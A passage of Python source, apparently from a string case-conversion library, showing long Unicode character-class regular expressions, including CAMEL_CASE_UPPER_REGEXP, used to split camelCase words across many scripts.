F-\u03F3\u03F5\u03F8\u03FB\u03FC\u0430-\u045F\u0461\u0463\u0465\u0467\u0469\u046B\u046D\u046F\u0471\u0473\u0475\u0477\u0479\u047B\u047D\u047F\u0481\u048B\u048D\u048F\u0491\u0493\u0495\u0497\u0499\u049B\u049D\u049F\u04A1\u04A3\u04A5\u04A7\u04A9\u04AB\u04AD\u04AF\u04B1\u04B3\u04B5\u04B7\u04B9\u04BB\u04BD\u04BF\u04C2\u04C4\u04C6\u04C8\u04CA\u04CC\u04CE\u04CF\u04D1\u04D3\u04D5\u04D7\u04D9\u04DB\u04DD\u04DF\u04E1\u04E3\u04E5\u04E7\u04E9\u04EB\u04ED\u04EF\u04F1\u04F3\u04F5\u04F7\u04F9\u04FB\u04FD\u04FF\u0501\u0503\u0505\u0507\u0509\u050B\u050D\u050F\u0511\u0513\u0515\u0517\u0519\u051B\u051D\u051F\u0521\u0523\u0525\u0527\u0529\u052B\u052D\u052F\u0561-\u0587\u13F8-\u13FD\u1D00-\u1D2B\u1D6B-\u1D77\u1D79-\u1D9A\u1E01\u1E03\u1E05\u1E07\u1E09\u1E0B\u1E0D\u1E0F\u1E11\u1E13\u1E15\u1E17\u1E19\u1E1B\u1E1D\u1E1F\u1E21\u1E23\u1E25\u1E27\u1E29\u1E2B\u1E2D\u1E
2F\u1E31\u1E33\u1E35\u1E37\u1E39\u1E3B\u1E3D\u1E3F\u1E41\u1E43\u1E45\u1E47\u1E49\u1E4B\u1E4D\u1E4F\u1E51\u1E53\u1E55\u1E57\u1E59\u1E5B\u1E5D\u1E5F\u1E61\u1E63\u1E65\u1E67\u1E69\u1E6B\u1E6D\u1E6F\u1E71\u1E73\u1E75\u1E77\u1E79\u1E7B\u1E7D\u1E7F\u1E81\u1E83\u1E85\u1E87\u1E89\u1E8B\u1E8D\u1E8F\u1E91\u1E93\u1E95-\u1E9D\u1E9F\u1EA1\u1EA3\u1EA5\u1EA7\u1EA9\u1EAB\u1EAD\u1EAF\u1EB1\u1EB3\u1EB5\u1EB7\u1EB9\u1EBB\u1EBD\u1EBF\u1EC1\u1EC3\u1EC5\u1EC7\u1EC9\u1ECB\u1ECD\u1ECF\u1ED1\u1ED3\u1ED5\u1ED7\u1ED9\u1EDB\u1EDD\u1EDF\u1EE1\u1EE3\u1EE5\u1EE7\u1EE9\u1EEB\u1EED\u1EEF\u1EF1\u1EF3\u1EF5\u1EF7\u1EF9\u1EFB\u1EFD\u1EFF-\u1F07\u1F10-\u1F15\u1F20-\u1F27\u1F30-\u1F37\u1F40-\u1F45\u1F50-\u1F57\u1F60-\u1F67\u1F70-\u1F7D\u1F80-\u1F87\u1F90-\u1F97\u1FA0-\u1FA7\u1FB0-\u1FB4\u1FB6\u1FB7\u1FBE\u1FC2-\u1FC4\u1FC6\u1FC7\u1FD0-\u1FD3\u1FD6\u1FD7\u1FE0-\u1FE7\u1FF2-\u1FF4\u1FF6\u1FF7\u210A\u210E\u210F\u2113\u212F\u2134\u2139\u213C\u213D\u2146-\u2149\u214E\u2184\u2C30-\u2C5E\u2C61\u2C65\u2C66\u2C68\u2C6A\u2C6C\u2C71\u2C73\u2C74\u2C76-\u2C7B\u2C81\u2C83\u2C85\u2C87\u2C89\u2C8B\u2C8D\u2C8F\u2C91\u2C93\u2C95\u2C97\u2C99\u2C9B\u2C9D\u2C9F\u2CA1\u2CA3\u2CA5\u2CA7\u2CA9\u2CAB\u2CAD\u2CAF\u2CB1\u2CB3\u2CB5\u2CB7\u2CB9\u2CBB\u2CBD\u2CBF\u2CC1\u2CC3\u2CC5\u2CC7\u2CC9\u2CCB\u2CCD\u2CCF\u2CD1\u2CD3\u2CD5\u2CD7\u2CD9\u2CDB\u2CDD\u2CDF\u2CE1\u2CE3\u2CE4\u2CEC\u2CEE\u2CF3\u2D00-\u2D25\u2D27\u2D2D\uA641\uA643\uA645\uA647\uA649\uA64B\uA64D\uA64F\uA651\uA653\uA655\uA657\uA659\uA65B\uA65D\uA65F\uA661\uA663\uA665\uA667\uA669\uA66B\uA66D\uA681\uA683\uA685\uA687\uA689\uA68B\uA68D\uA68F\uA691\uA693\uA695\uA697\uA699\uA69B\uA723\uA725\uA727\uA729\uA72B\uA72D\uA72F-\uA731\uA733\uA735\uA737\uA739\uA73B\uA73D\uA73F\uA741\uA743\uA745\uA747\uA749\uA74B\uA74D\uA74F\uA751\uA753\uA755\uA757\uA759\uA75B\uA75D\uA75F\uA761\uA763\uA765\uA767\uA769\uA76B\uA76D\uA76F\uA771-\uA778\uA77A\uA77C\uA77F\uA781\uA783\uA785\uA787\uA78C\uA78E\uA791\uA793-\uA795\uA797\uA799\uA79B\uA79D\uA79F\uA7A1\uA7A3\uA7A5\uA7A7\uA7A9\uA7B5\uA7B7\uA7FA\uAB30
-\uAB5A\uAB60-\uAB65\uAB70-\uABBF\uFB00-\uFB06\uFB13-\uFB17\uFF41-\uFF5A0-9\xB2\xB3\xB9\xBC-\xBE\u0660-\u0669\u06F0-\u06F9\u07C0-\u07C9\u0966-\u096F\u09E6-\u09EF\u09F4-\u09F9\u0A66-\u0A6F\u0AE6-\u0AEF\u0B66-\u0B6F\u0B72-\u0B77\u0BE6-\u0BF2\u0C66-\u0C6F\u0C78-\u0C7E\u0CE6-\u0CEF\u0D66-\u0D75\u0DE6-\u0DEF\u0E50-\u0E59\u0ED0-\u0ED9\u0F20-\u0F33\u1040-\u1049\u1090-\u1099\u1369-\u137C\u16EE-\u16F0\u17E0-\u17E9\u17F0-\u17F9\u1810-\u1819\u1946-\u194F\u19D0-\u19DA\u1A80-\u1A89\u1A90-\u1A99\u1B50-\u1B59\u1BB0-\u1BB9\u1C40-\u1C49\u1C50-\u1C59\u2070\u2074-\u2079\u2080-\u2089\u2150-\u2182\u2185-\u2189\u2460-\u249B\u24EA-\u24FF\u2776-\u2793\u2CFD\u3007\u3021-\u3029\u3038-\u303A\u3192-\u3195\u3220-\u3229\u3248-\u324F\u3251-\u325F\u3280-\u3289\u32B1-\u32BF\uA620-\uA629\uA6E6-\uA6EF\uA830-\uA835\uA8D0-\uA8D9\uA900-\uA909\uA9D0-\uA9D9\uA9F0-\uA9F9\uAA50-\uAA59\uABF0-\uABF9\uFF10-\uFF19])([A-Z\xC0-\xD6\xD8-\xDE\u0100\u0102\u0104\u0106\u0108\u010A\u010C\u010E\u0110\u0112\u0114\u0116\u0118\u011A\u011C\u011E\u0120\u0122\u0124\u0126\u0128\u012A\u012C\u012E\u0130\u0132\u0134\u0136\u0139\u013B\u013D\u013F\u0141\u0143\u0145\u0147\u014A\u014C\u014E\u0150\u0152\u0154\u0156\u0158\u015A\u015C\u015E\u0160\u0162\u0164\u0166\u0168\u016A\u016C\u016E\u0170\u0172\u0174\u0176\u0178\u0179\u017B\u017D\u0181\u0182\u0184\u0186\u0187\u0189-\u018B\u018E-\u0191\u0193\u0194\u0196-\u0198\u019C\u019D\u019F\u01A0\u01A2\u01A4\u01A6\u01A7\u01A9\u01AC\u01AE\u01AF\u01B1-\u01B3\u01B5\u01B7\u01B8\u01BC\u01C4\u01C7\u01CA\u01CD\u01CF\u01D1\u01D3\u01D5\u01D7\u01D9\u01DB\u01DE\u01E0\u01E2\u01E4\u01E6\u01E8\u01EA\u01EC\u01EE\u01F1\u01F4\u01F6-\u01F8\u01FA\u01FC\u01FE\u0200\u0202\u0204\u0206\u0208\u020A\u020C\u020E\u0210\u0212\u0214\u0216\u0218\u021A\u021C\u021E\u0220\u0222\u0224\u0226\u0228\u022A\u022C\u022E\u0230\u0232\u023A\u023B\u023D\u023E\u0241\u0243-\u0246\u0248\u024A\u024C\u024E\u0370\u0372\u0376\u037F\u0386\u0388-\u038A\u038C\u038E\u038F\u0391-\u03A1\u03A3-\u03AB\u03CF\u03D2-\u03D4\u03D8\u03DA\u03DC\u03DE\u03E0\u03
E2\u03E4\u03E6\u03E8\u03EA\u03EC\u03EE\u03F4\u03F7\u03F9\u03FA\u03FD-\u042F\u0460\u0462\u0464\u0466\u0468\u046A\u046C\u046E\u0470\u0472\u0474\u0476\u0478\u047A\u047C\u047E\u0480\u048A\u048C\u048E\u0490\u0492\u0494\u0496\u0498\u049A\u049C\u049E\u04A0\u04A2\u04A4\u04A6\u04A8\u04AA\u04AC\u04AE\u04B0\u04B2\u04B4\u04B6\u04B8\u04BA\u04BC\u04BE\u04C0\u04C1\u04C3\u04C5\u04C7\u04C9\u04CB\u04CD\u04D0\u04D2\u04D4\u04D6\u04D8\u04DA\u04DC\u04DE\u04E0\u04E2\u04E4\u04E6\u04E8\u04EA\u04EC\u04EE\u04F0\u04F2\u04F4\u04F6\u04F8\u04FA\u04FC\u04FE\u0500\u0502\u0504\u0506\u0508\u050A\u050C\u050E\u0510\u0512\u0514\u0516\u0518\u051A\u051C\u051E\u0520\u0522\u0524\u0526\u0528\u052A\u052C\u052E\u0531-\u0556\u10A0-\u10C5\u10C7\u10CD\u13A0-\u13F5\u1E00\u1E02\u1E04\u1E06\u1E08\u1E0A\u1E0C\u1E0E\u1E10\u1E12\u1E14\u1E16\u1E18\u1E1A\u1E1C\u1E1E\u1E20\u1E22\u1E24\u1E26\u1E28\u1E2A\u1E2C\u1E2E\u1E30\u1E32\u1E34\u1E36\u1E38\u1E3A\u1E3C\u1E3E\u1E40\u1E42\u1E44\u1E46\u1E48\u1E4A\u1E4C\u1E4E\u1E50\u1E52\u1E54\u1E56\u1E58\u1E5A\u1E5C\u1E5E\u1E60\u1E62\u1E64\u1E66\u1E68\u1E6A\u1E6C\u1E6E\u1E70\u1E72\u1E74\u1E76\u1E78\u1E7A\u1E7C\u1E7E\u1E80\u1E82\u1E84\u1E86\u1E88\u1E8A\u1E8C\u1E8E\u1E90\u1E92\u1E94\u1E9E\u1EA0\u1EA2\u1EA4\u1EA6\u1EA8\u1EAA\u1EAC\u1EAE\u1EB0\u1EB2\u1EB4\u1EB6\u1EB8\u1EBA\u1EBC\u1EBE\u1EC0\u1EC2\u1EC4\u1EC6\u1EC8\u1ECA\u1ECC\u1ECE\u1ED0\u1ED2\u1ED4\u1ED6\u1ED8\u1EDA\u1EDC\u1EDE\u1EE0\u1EE2\u1EE4\u1EE6\u1EE8\u1EEA\u1EEC\u1EEE\u1EF0\u1EF2\u1EF4\u1EF6\u1EF8\u1EFA\u1EFC\u1EFE\u1F08-\u1F0F\u1F18-\u1F1D\u1F28-\u1F2F\u1F38-\u1F3F\u1F48-\u1F4D\u1F59\u1F5B\u1F5D\u1F5F\u1F68-\u1F6F\u1FB8-\u1FBB\u1FC8-\u1FCB\u1FD8-\u1FDB\u1FE8-\u1FEC\u1FF8-\u1FFB\u2102\u2107\u210B-\u210D\u2110-\u2112\u2115\u2119-\u211D\u2124\u2126\u2128\u212A-\u212D\u2130-\u2133\u213E\u213F\u2145\u2183\u2C00-\u2C2E\u2C60\u2C62-\u2C64\u2C67\u2C69\u2C6B\u2C6D-\u2C70\u2C72\u2C75\u2C7E-\u2C80\u2C82\u2C84\u2C86\u2C88\u2C8A\u2C8C\u2C8E\u2C90\u2C92\u2C94\u2C96\u2C98\u2C9A\u2C9C\u2C9E\u2CA0\u2CA2\u2CA4\u2CA6\u2CA8\u2CAA\u2CAC\u2CAE\u2CB0\u2CB2
\u2CB4\u2CB6\u2CB8\u2CBA\u2CBC\u2CBE\u2CC0\u2CC2\u2CC4\u2CC6\u2CC8\u2CCA\u2CCC\u2CCE\u2CD0\u2CD2\u2CD4\u2CD6\u2CD8\u2CDA\u2CDC\u2CDE\u2CE0\u2CE2\u2CEB\u2CED\u2CF2\uA640\uA642\uA644\uA646\uA648\uA64A\uA64C\uA64E\uA650\uA652\uA654\uA656\uA658\uA65A\uA65C\uA65E\uA660\uA662\uA664\uA666\uA668\uA66A\uA66C\uA680\uA682\uA684\uA686\uA688\uA68A\uA68C\uA68E\uA690\uA692\uA694\uA696\uA698\uA69A\uA722\uA724\uA726\uA728\uA72A\uA72C\uA72E\uA732\uA734\uA736\uA738\uA73A\uA73C\uA73E\uA740\uA742\uA744\uA746\uA748\uA74A\uA74C\uA74E\uA750\uA752\uA754\uA756\uA758\uA75A\uA75C\uA75E\uA760\uA762\uA764\uA766\uA768\uA76A\uA76C\uA76E\uA779\uA77B\uA77D\uA77E\uA780\uA782\uA784\uA786\uA78B\uA78D\uA790\uA792\uA796\uA798\uA79A\uA79C\uA79E\uA7A0\uA7A2\uA7A4\uA7A6\uA7A8\uA7AA-\uA7AD\uA7B0-\uA7B4\uA7B6\uFF21-\uFF3A])')
CAMEL_CASE_UPPER_REGEXP = re.compile(r'([A-Z\xC0-\xD6\xD8-\xDE\u0100\u0102\u0104\u0106\u0108\u010A\u010C\u010E\u0110\u0112\u0114\u0116\u0118\u011A\u011C\u011E\u0120\u0122\u0124\u0126\u0128\u012A\u012C\u012E\u0130\u0132\u0134\u0136\u0139\u013B\u013D\u013F\u0141\u0143\u0145\u0147\u014A\u014C\u014E\u0150\u0152\u0154\u0156\u0158\u015A\u015C\u015E\u0160\u0162\u0164\u0166\u0168\u016A\u016C\u016E\u0170\u0172\u0174\u0176\u0178\u0179\u017B\u017D\u0181\u0182\u0184\u0186\u0187\u0189-\u018B\u018E-\u0191\u0193\u0194\u0196-\u0198\u019C\u019D\u019F\u01A0\u01A2\u01A4\u01A6\u01A7\u01A9\u01AC\u01AE\u01AF\u01B1-\u01B3\u01B5\u01B7\u01B8\u01BC\u01C4\u01C7\u01CA\u01CD\u01CF\u01D1\u01D3\u01D5\u01D7\u01D9\u01DB\u01DE\u01E0\u01E2\u01E4\u01E6\u01E8\u01EA\u01EC\u01EE\u01F1\u01F4\u01F6-\u01F8\u01FA\u01FC\u01FE\u0200\u0202\u0204\u0206\u0208\u020A\u020C\u020E\u0210\u0212\u0214\u0216\u0218\u021A\u021C\u021E\u0220\u0222\u0224\u0226\u0228\u022A\u022C\u022E\u0230\u0232\u023A\u023B\u023D\u023E\u0241\u0243-\u0246\u0248\u024A\u024C\u024E\u0370\u0372\u0376\u037F\u0386\u0388-\u038A\u038C\u038E\u038F\u0391-\u03A1\u03A3-\u03AB\u03CF\u03D2-\u03D4\u03D8\u03DA\u03DC\u03DE\u03E0\u03E2\u03E4\u03E6\u03E8\u03EA\u03EC\u03EE\u03F4\u03F7\u03F9\u03FA\u03FD-\u042F\u0460\u0462\u0464\u0466\u0468\u046A\u046C\u046E\u0470\u0472\u0474\u0476\u0478\u047A\u047C\u047E\u0480\u048A\u048C\u048E\u0490\u0492\u0494\u0496\u0498\u049A\u049C\u049E\u04A0\u04A2\u04A4\u04A6\u04A8\u04AA\u04AC\u04AE\u04B0\u04B2\u04B4\u04B6\u04B8\u04BA\u04BC\u04BE\u04C0\u04C1\u04C3\u04C5\u04C7\u04C9\u04CB\u04CD\u04D0\u04D2\u04D4\u04D6\u04D8\u04DA\u04DC\u04DE\u04E0\u04E2\u04E4\u04E6\u04E8\u04EA\u04EC\u04EE\u04F0\u04F2\u04F4\u04F6\u04F8\u04FA\u04FC\u04FE\u0500\u0502\u0504\u0506\u0508\u050A\u050C\u050E\u0510\u0512\u0514\u0516\u0518\u051A\u051C\u051E\u0520\u0522\u0524\u0526\u0528\u052A\u052C\u052E\u0531-\u0556\u10A0-\u10C5\u10C7\u10CD\u13A0-\u13F5\u1E00\u1E02\u1E04\u1E06\u1E08\u1E0A\u1E0C\u1E0E\u1E10\u1E12\u1E14\u1E16\u1E18\u1E1A\u1E1C\u1E1E\u1E20\u1E22\u1E24\u1E
26\u1E28\u1E2A\u1E2C\u1E2E\u1E30\u1E32\u1E34\u1E36\u1E38\u1E3A\u1E3C\u1E3E\u1E40\u1E42\u1E44\u1E46\u1E48\u1E4A\u1E4C\u1E4E\u1E50\u1E52\u1E54\u1E56\u1E58\u1E5A\u1E5C\u1E5E\u1E60\u1E62\u1E64\u1E66\u1E68\u1E6A\u1E6C\u1E6E\u1E70\u1E72\u1E74\u1E76\u1E78\u1E7A\u1E7C\u1E7E\u1E80\u1E82\u1E84\u1E86\u1E88\u1E8A\u1E8C\u1E8E\u1E90\u1E92\u1E94\u1E9E\u1EA0\u1EA2\u1EA4\u1EA6\u1EA8\u1EAA\u1EAC\u1EAE\u1EB0\u1EB2\u1EB4\u1EB6\u1EB8\u1EBA\u1EBC\u1EBE\u1EC0\u1EC2\u1EC4\u1EC6\u1EC8\u1ECA\u1ECC\u1ECE\u1ED0\u1ED2\u1ED4\u1ED6\u1ED8\u1EDA\u1EDC\u1EDE\u1EE0\u1EE2\u1EE4\u1EE6\u1EE8\u1EEA\u1EEC\u1EEE\u1EF0\u1EF2\u1EF4\u1EF6\u1EF8\u1EFA\u1EFC\u1EFE\u1F08-\u1F0F\u1F18-\u1F1D\u1F28-\u1F2F\u1F38-\u1F3F\u1F48-\u1F4D\u1F59\u1F5B\u1F5D\u1F5F\u1F68-\u1F6F\u1FB8-\u1FBB\u1FC8-\u1FCB\u1FD8-\u1FDB\u1FE8-\u1FEC\u1FF8-\u1FFB\u2102\u2107\u210B-\u210D\u2110-\u2112\u2115\u2119-\u211D\u2124\u2126\u2128\u212A-\u212D\u2130-\u2133\u213E\u213F\u2145\u2183\u2C00-\u2C2E\u2C60\u2C62-\u2C64\u2C67\u2C69\u2C6B\u2C6D-\u2C70\u2C72\u2C75\u2C7E-\u2C80\u2C82\u2C84\u2C86\u2C88\u2C8A\u2C8C\u2C8E\u2C90\u2C92\u2C94\u2C96\u2C98\u2C9A\u2C9C\u2C9E\u2CA0\u2CA2\u2CA4\u2CA6\u2CA8\u2CAA\u2CAC\u2CAE\u2CB0\u2CB2\u2CB4\u2CB6\u2CB8\u2CBA\u2CBC\u2CBE\u2CC0\u2CC2\u2CC4\u2CC6\u2CC8\u2CCA\u2CCC\u2CCE\u2CD0\u2CD2\u2CD4\u2CD6\u2CD8\u2CDA\u2CDC\u2CDE\u2CE0\u2CE2\u2CEB\u2CED\u2CF2\uA640\uA642\uA644\uA646\uA648\uA64A\uA64C\uA64E\uA650\uA652\uA654\uA656\uA658\uA65A\uA65C\uA65E\uA660\uA662\uA664\uA666\uA668\uA66A\uA66C\uA680\uA682\uA684\uA686\uA688\uA68A\uA68C\uA68E\uA690\uA692\uA694\uA696\uA698\uA69A\uA722\uA724\uA726\uA728\uA72A\uA72C\uA72E\uA732\uA734\uA736\uA738\uA73A\uA73C\uA73E\uA740\uA742\uA744\uA746\uA748\uA74A\uA74C\uA74E\uA750\uA752\uA754\uA756\uA758\uA75A\uA75C\uA75E\uA760\uA762\uA764\uA766\uA768\uA76A\uA76C\uA76E\uA779\uA77B\uA77D\uA77E\uA780\uA782\uA784\uA786\uA78B\uA78D\uA790\uA792\uA796\uA798\uA79A\uA79C\uA79E\uA7A0\uA7A2\uA7A4\uA7A6\uA7A8\uA7AA-\uA7AD\uA7B0-\uA7B4\uA7B6\uFF21-\uFF3A]+)([A-Z\xC0-\xD6\xD8-\xDE\u0100\u0102\u0104\u0106\u010
8\u010A\u010C\u010E\u0110\u0112\u0114\u0116\u0118\u011A\u011C\u011E\u0120\u0122\u0124\u0126\u0128\u012A\u012C\u012E\u0130\u0132\u0134\u0136\u0139\u013B\u013D\u013F\u0141\u0143\u0145\u0147\u014A\u014C\u014E\u0150\u0152\u0154\u0156\u0158\u015A\u015C\u015E\u0160\u0162\u0164\u0166\u0168\u016A\u016C\u016E\u0170\u0172\u0174\u0176\u0178\u0179\u017B\u017D\u0181\u0182\u0184\u0186\u0187\u0189-\u018B\u018E-\u0191\u0193\u0194\u0196-\u0198\u019C\u019D\u019F\u01A0\u01A2\u01A4\u01A6\u01A7\u01A9\u01AC\u01AE\u01AF\u01B1-\u01B3\u01B5\u01B7\u01B8\u01BC\u01C4\u01C7\u01CA\u01CD\u01CF\u01D1\u01D3\u01D5\u01D7\u01D9\u01DB\u01DE\u01E0\u01E2\u01E4\u01E6\u01E8\u01EA\u01EC\u01EE\u01F1\u01F4\u01F6-\u01F8\u01FA\u01FC\u01FE\u0200\u0202\u0204\u0206\u0208\u020A\u020C\u020E\u0210\u0212\u0214\u0216\u0218\u021A\u021C\u021E\u0220\u0222\u0224\u0226\u0228\u022A\u022C\u022E\u0230\u0232\u023A\u023B\u023D\u023E\u0241\u0243-\u0246\u0248\u024A\u024C\u024E\u0370\u0372\u0376\u037F\u0386\u0388-\u038A\u038C\u038E\u038F\u0391-\u03A1\u03A3-\u03AB\u03CF\u03D2-\u03D4\u03D8\u03DA\u03DC\u03DE\u03E0\u03E2\u03E4\u03E6\u03E8\u03EA\u03EC\u03EE\u03F4\u03F7\u03F9\u03FA\u03FD-\u042F\u0460\u0462\u0464\u0466\u0468\u046A\u046C\u046E\u0470\u0472\u0474\u0476\u0478\u047A\u047C\u047E\u0480\u048A\u048C\u048E\u0490\u0492\u0494\u0496\u0498\u049A\u049C\u049E\u04A0\u04A2\u04A4\u04A6\u04A8\u04AA\u04AC\u04AE\u04B0\u04B2\u04B4\u04B6\u04B8\u04BA\u04BC\u04BE\u04C0\u04C1\u04C3\u04C5\u04C7\u04C9\u04CB\u04CD\u04D0\u04D2\u04D4\u04D6\u04D8\u04DA\u04DC\u04DE\u04E0\u04E2\u04E4\u04E6\u04E8\u04EA\u04EC\u04EE\u04F0\u04F2\u04F4\u04F6\u04F8\u04FA\u04FC\u04FE\u0500\u0502\u0504\u0506\u0508\u050A\u050C\u050E\u0510\u0512\u0514\u0516\u0518\u051A\u051C\u051E\u0520\u0522\u0524\u0526\u0528\u052A\u052C\u052E\u0531-\u0556\u10A0-\u10C5\u10C7\u10CD\u13A0-\u13F5\u1E00\u1E02\u1E04\u1E06\u1E08\u1E0A\u1E0C\u1E0E\u1E10\u1E12\u1E14\u1E16\u1E18\u1E1A\u1E1C\u1E1E\u1E20\u1E22\u1E24\u1E26\u1E28\u1E2A\u1E2C\u1E2E\u1E30\u1E32\u1E34\u1E36\u1E38\u1E3A\u1E3C\u1E3E\u1E40\u1E42\u1E4
4\u1E46\u1E48\u1E4A\u1E4C\u1E4E\u1E50\u1E52\u1E54\u1E56\u1E58\u1E5A\u1E5C\u1E5E\u1E60\u1E62\u1E64\u1E66\u1E68\u1E6A\u1E6C\u1E6E\u1E70\u1E72\u1E74\u1E76\u1E78\u1E7A\u1E7C\u1E7E\u1E80\u1E82\u1E84\u1E86\u1E88\u1E8A\u1E8C\u1E8E\u1E90\u1E92\u1E94\u1E9E\u1EA0\u1EA2\u1EA4\u1EA6\u1EA8\u1EAA\u1EAC\u1EAE\u1EB0\u1EB2\u1EB4\u1EB6\u1EB8\u1EBA\u1EBC\u1EBE\u1EC0\u1EC2\u1EC4\u1EC6\u1EC8\u1ECA\u1ECC\u1ECE\u1ED0\u1ED2\u1ED4\u1ED6\u1ED8\u1EDA\u1EDC\u1EDE\u1EE0\u1EE2\u1EE4\u1EE6\u1EE8\u1EEA\u1EEC\u1EEE\u1EF0\u1EF2\u1EF4\u1EF6\u1EF8\u1EFA\u1EFC\u1EFE\u1F08-\u1F0F\u1F18-\u1F1D\u1F28-\u1F2F\u1F38-\u1F3F\u1F48-\u1F4D\u1F59\u1F5B\u1F5D\u1F5F\u1F68-\u1F6F\u1FB8-\u1FBB\u1FC8-\u1FCB\u1FD8-\u1FDB\u1FE8-\u1FEC\u1FF8-\u1FFB\u2102\u2107\u210B-\u210D\u2110-\u2112\u2115\u2119-\u211D\u2124\u2126\u2128\u212A-\u212D\u2130-\u2133\u213E\u213F\u2145\u2183\u2C00-\u2C2E\u2C60\u2C62-\u2C64\u2C67\u2C69\u2C6B\u2C6D-\u2C70\u2C72\u2C75\u2C7E-\u2C80\u2C82\u2C84\u2C86\u2C88\u2C8A\u2C8C\u2C8E\u2C90\u2C92\u2C94\u2C96\u2C98\u2C9A\u2C9C\u2C9E\u2CA0\u2CA2\u2CA4\u2CA6\u2CA8\u2CAA\u2CAC\u2CAE\u2CB0\u2CB2\u2CB4\u2CB6\u2CB8\u2CBA\u2CBC\u2CBE\u2CC0\u2CC2\u2CC4\u2CC6\u2CC8\u2CCA\u2CCC\u2CCE\u2CD0\u2CD2\u2CD4\u2CD6\u2CD8\u2CDA\u2CDC\u2CDE\u2CE0\u2CE2\u2CEB\u2CED\u2CF2\uA640\uA642\uA644\uA646\uA648\uA64A\uA64C\uA64E\uA650\uA652\uA654\uA656\uA658\uA65A\uA65C\uA65E\uA660\uA662\uA664\uA666\uA668\uA66A\uA66C\uA680\uA682\uA684\uA686\uA688\uA68A\uA68C\uA68E\uA690\uA692\uA694\uA696\uA698\uA69A\uA722\uA724\uA726\uA728\uA72A\uA72C\uA72E\uA732\uA734\uA736\uA738\uA73A\uA73C\uA73E\uA740\uA742\uA744\uA746\uA748\uA74A\uA74C\uA74E\uA750\uA752\uA754\uA756\uA758\uA75A\uA75C\uA75E\uA760\uA762\uA764\uA766\uA768\uA76A\uA76C\uA76E\uA779\uA77B\uA77D\uA77E\uA780\uA782\uA784\uA786\uA78B\uA78D\uA790\uA792\uA796\uA798\uA79A\uA79C\uA79E\uA7A0\uA7A2\uA7A4\uA7A6\uA7A8\uA7AA-\uA7AD\uA7B0-\uA7B4\uA7B6\uFF21-\uFF3A][a-z\xB5\xDF-\xF6\xF8-\xFF\u0101\u0103\u0105\u0107\u0109\u010B\u010D\u010F\u0111\u0113\u0115\u0117\u0119\u011B\u011D\u011F\u0121\u0123\u0125\u012
7\u0129\u012B\u012D\u012F\u0131\u0133\u0135\u0137\u0138\u013A\u013C\u013E\u0140\u0142\u0144\u0146\u0148\u0149\u014B\u014D\u014F\u0151\u0153\u0155\u0157\u0159\u015B\u015D\u015F\u0161\u0163\u0165\u0167\u0169\u016B\u016D\u016F\u0171\u0173\u0175\u0177\u017A\u017C\u017E-\u0180\u0183\u0185\u0188\u018C\u018D\u0192\u0195\u0199-\u019B\u019E\u01A1\u01A3\u01A5\u01A8\u01AA\u01AB\u01AD\u01B0\u01B4\u01B6\u01B9\u01BA\u01BD-\u01BF\u01C6\u01C9\u01CC\u01CE\u01D0\u01D2\u01D4\u01D6\u01D8\u01DA\u01DC\u01DD\u01DF\u01E1\u01E3\u01E5\u01E7\u01E9\u01EB\u01ED\u01EF\u01F0\u01F3\u01F5\u01F9\u01FB\u01FD\u01FF\u0201\u0203\u0205\u0207\u0209\u020B\u020D\u020F\u0211\u0213\u0215\u0217\u0219\u021B\u021D\u021F\u0221\u0223\u0225\u0227\u0229\u022B\u022D\u022F\u0231\u0233-\u0239\u023C\u023F\u0240\u0242\u0247\u0249\u024B\u024D\u024F-\u0293\u0295-\u02AF\u0371\u0373\u0377\u037B-\u037D\u0390\u03AC-\u03CE\u03D0\u03D1\u03D5-\u03D7\u03D9\u03DB\u03DD\u03DF\u03E1\u03E3\u03E5\u03E7\u03E9\u03EB\u03ED\u03EF-\u03F3\u03F5\u03F8\u03FB\u03FC\u0430-\u045F\u0461\u0463\u0465\u0467\u0469\u046B\u046D\u046F\u0471\u0473\u0475\u0477\u0479\u047B\u047D\u047F\u0481\u048B\u048D\u048F\u0491\u0493\u0495\u0497\u0499\u049B\u049D\u049F\u04A1\u04A3\u04A5\u04A7\u04A9\u04AB\u04AD\u04AF\u04B1\u04B3\u04B5\u04B7\u04B9\u04BB\u04BD\u04BF\u04C2\u04C4\u04C6\u04C8\u04CA\u04CC\u04CE\u04CF\u04D1\u04D3\u04D5\u04D7\u04D9\u04DB\u04DD\u04DF\u04E1\u04E3\u04E5\u04E7\u04E9\u04EB\u04ED\u04EF\u04F1\u04F3\u04F5\u04F7\u04F9\u04FB\u04FD\u04FF\u0501\u0503\u0505\u0507\u0509\u050B\u050D\u050F\u0511\u0513\u0515\u0517\u0519\u051B\u051D\u051F\u0521\u0523\u0525\u0527\u0529\u052B\u052D\u052F\u0561-\u0587\u13F8-\u13FD\u1D00-\u1D2B\u1D6B-\u1D77\u1D79-\u1D9A\u1E01\u1E03\u1E05\u1E07\u1E09\u1E0B\u1E0D\u1E0F\u1E11\u1E13\u1E15\u1E17\u1E19\u1E1B\u1E1D\u1E1F\u1E21\u1E23\u1E25\u1E27\u1E29\u1E2B\u1E2D\u1E2F\u1E31\u1E33\u1E35\u1E37\u1E39\u1E3B\u1E3D\u1E3F\u1E41\u1E43\u1E45\u1E47\u1E49\u1E4B\u1E4D\u1E4F\u1E51\u1E53\u1E55\u1E57\u1E59\u1E5B\u1E5D\u1E5F\u1E61\u1E63\u1E65\u1E67\u1E69\u1
E6B\u1E6D\u1E6F\u1E71\u1E73\u1E75\u1E77\u1E79\u1E7B\u1E7D\u1E7F\u1E81\u1E83\u1E85\u1E87\u1E89\u1E8B\u1E8D\u1E8F\u1E91\u1E93\u1E95-\u1E9D\u1E9F\u1EA1\u1EA3\u1EA5\u1EA7\u1EA9\u1EAB\u1EAD\u1EAF\u1EB1\u1EB3\u1EB5\u1EB7\u1EB9\u1EBB\u1EBD\u1EBF\u1EC1\u1EC3\u1EC5\u1EC7\u1EC9\u1ECB\u1ECD\u1ECF\u1ED1\u1ED3\u1ED5\u1ED7\u1ED9\u1EDB\u1EDD\u1EDF\u1EE1\u1EE3\u1EE5\u1EE7\u1EE9\u1EEB\u1EED\u1EEF\u1EF1\u1EF3\u1EF5\u1EF7\u1EF9\u1EFB\u1EFD\u1EFF-\u1F07\u1F10-\u1F15\u1F20-\u1F27\u1F30-\u1F37\u1F40-\u1F45\u1F50-\u1F57\u1F60-\u1F67\u1F70-\u1F7D\u1F80-\u1F87\u1F90-\u1F97\u1FA0-\u1FA7\u1FB0-\u1FB4\u1FB6\u1FB7\u1FBE\u1FC2-\u1FC4\u1FC6\u1FC7\u1FD0-\u1FD3\u1FD6\u1FD7\u1FE0-\u1FE7\u1FF2-\u1FF4\u1FF6\u1FF7\u210A\u210E\u210F\u2113\u212F\u2134\u2139\u213C\u213D\u2146-\u2149\u